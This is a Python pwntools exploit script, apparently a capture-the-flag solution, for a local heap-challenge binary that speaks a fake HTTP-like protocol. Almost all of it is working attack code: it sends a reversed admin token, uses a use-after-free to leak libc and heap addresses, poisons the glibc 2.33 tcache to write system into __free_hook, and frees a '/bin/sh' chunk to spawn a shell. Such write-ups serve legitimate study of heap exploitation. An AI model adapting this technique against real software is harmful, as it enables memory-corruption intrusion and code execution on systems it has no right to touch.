from pwn import *

# Target process and the binaries the script takes symbol/offset context from.
# Spawned at import time: the rest of the file is a flat script that drives `r`.
r=process('./pwn')
elf = ELF('./pwn')
# Hard-coded local path to the libc build the offsets later in the file were
# taken from (glibc 2.33); the script will not run on another machine as-is.
libc= ELF('/home/dreamcat/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/libc-2.33.so')
def getadmin():
    """Send the 'DEV' request that switches the challenge service into its
    privileged mode.

    The request body is "administrator" spelled backwards, a NUL byte and a
    trailing space -- presumably a hard-coded role token the service compares
    against (not verifiable from here). It is sent as a str (pwntools encodes
    it) on the module-level tube `r` once the "Waiting Package..." prompt has
    been seen.
    """
    request_line = "DEV /root/src HTTP/1.1 \r\n"
    role_token = "rotartsinimda\x00 "
    r.sendlineafter("Waiting Package...", request_line + role_token)
def dbg():
    """Development helper: attach gdb to the tube `r`, then wait one second.

    Only useful on a machine with an attachable terminal; it is never called by
    the script itself.
    """
    gdb.attach(r)
    pause(1)
def add(idx, size, text):
    """Send an allocate request (opcode 0x01) with slot index, size and contents.

    The service's command format, as used throughout this file, is the fixed
    request line `POST /root/src HTTP/1.1 \r\n` followed by a one-byte opcode and
    '&'-separated fields. `text` must already be bytes; `idx` and `size` are
    rendered as decimal. Sent on the module-level tube `r` after its
    "Waiting Package" prompt.
    """
    fields = [b"\x01", str(idx).encode("utf-8"), str(size).encode("utf-8"), text]
    request = b"POST /root/src HTTP/1.1 \r\n" + b"&".join(fields)
    r.sendlineafter("Waiting Package", request)
def edit(idx, text):
    """Send an edit request (opcode 0x02) that rewrites slot `idx` with `text`.

    Same wire format as `add`: fixed request line, opcode byte, '&'-separated
    fields. `text` must be bytes. Note the service honours this for slots that
    have already been freed, which the exploit below relies on.
    """
    fields = [b"\x02", str(idx).encode("utf-8"), text]
    request = b"POST /root/src HTTP/1.1 \r\n" + b"&".join(fields)
    r.sendlineafter("Waiting Package", request)


def show(idx):
    """Send a show request (opcode 0x03) for slot `idx`; the reply is read by the caller.

    The field list ends with a trailing '&' (the service apparently expects a
    terminated field even when no payload follows).
    """
    request = b"POST /root/src HTTP/1.1 \r\n" + b"\x03&" + str(idx).encode("utf-8") + b"&"
    r.sendlineafter("Waiting Package", request)
def free(idx):
    """Send a free request (opcode 0x04) for slot `idx`.

    Same wire format as the other helpers; the index is rendered as decimal and
    followed by a trailing '&'.
    """
    request = b"POST /root/src HTTP/1.1 \r\n" + b"\x04&" + str(idx).encode("utf-8") + b"&"
    r.sendlineafter("Waiting Package", request)
# ---------------------------------------------------------------------------
# Flat exploitation sequence; runs at module level.
# ---------------------------------------------------------------------------
# NOTE(review): debugging leftover -- attaches gdb with a breakpoint on malloc,
# so the script needs an attachable terminal and will not run unattended.
gdb.attach(r,'b malloc')
getadmin()
# One large chunk (0x420), two small ones (0x60); free the large one, then
# request another large chunk. Slot 0 is read back below *after* it was freed,
# i.e. the service keeps a dangling pointer (use-after-free read).
add(0,0x420,b'a'*16)
add(1,0x60,b'a'*8)
add(3,0x60,b'a'*8)
free(0)
add(2,0x430,b'a'*8)
show(0)
r.recvuntil("Length: 6\n")
# The leaked bytes up to the 0x7f high byte are a pointer into libc; the
# subtracted constant is that pointer's offset from the base of the libc build
# loaded above. NOTE: this rebinds `libc` from an ELF object to an int.
libc = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))-0x1e0ff0
# All offsets below are specific to the 2.33-0ubuntu5 libc referenced above.
malloc_hook = libc+0x1e0b90
free_hook = 0x1e3e20+libc
realloc = libc + 0x097b20
system = libc + 0x4fa60
# Placeholder, not a real address; it is only ever written as slot 4's contents.
one_gadget = 0xcafebabedeadbeef
print("libc : ",hex(libc))
print("malloc_hook : ",hex(malloc_hook))
print("free_hook : ",hex(free_hook))
print("realloc : ",hex(realloc))
# Free a small chunk and read it back through the same UAF. Its fd is stored
# mangled (see the note at the end of the file); the script assumes the bin
# was empty so the xor term is 0 and `<< 12` recovers the page-aligned heap
# address, to which a fixed in-page offset is added.
free(1)
show(1)
r.recvuntil("Content-Length: 5\n")
heap_addr1 = (u64(r.recvuntil(b"\n",drop = True).ljust(8,b'\x00'))<<12)+0x6d0
print("heap_addr1 : ",hex(heap_addr1))
# presumably the address of slot 3's chunk (0x60 request -> 0x70 chunk after
# slot 1) -- TODO confirm against the commented-out leak below
heap_addr2 = heap_addr1+0x70
# Tcache poisoning via the UAF write: free slot 3, then overwrite its fd with
# a mangled pointer ((address >> 12) ^ target) aimed at free_hook-0x10, so a
# later allocation of this size is handed out at that address.
free(3)
payload = p64((heap_addr2>>12)^(free_hook-0x10))
edit(3,payload)
add(4,0x60,p64(one_gadget))
# 0x10 bytes of filler cover free_hook-0x10..free_hook, then `system` is
# written at the address named free_hook.
add(5,0x60,p64(0xaaaaaaaaaaaaaaaa)+p64(0xbbbbbbbbbbbbbbbb)+p64(system))
# Freeing a chunk whose contents are "/bin/sh" is what triggers the hijacked hook.
add(6,0x60,b'/bin/sh\x00')
free(6)
# Commented-out alternative: leak heap_addr2 directly instead of deriving it.
'''
free(3)
show(3)
r.recvuntil("Content-Length: 5\n")
heap_addr2 = (u64(r.recvuntil(b"\n",drop = True).ljust(8,b'\x00'))<<12)
print("heap_addr2 : ",hex(heap_addr2))
'''
# Author's note on glibc 2.33 safe-linking (fd mangling) in the tcache.
''' in glibc 2.33 tcache, if we put a new chunk in tcachebin, chunk->fd = ((chunk_user)>>12)^(last_freed_tcachechunk in this bin) '''
r.interactive()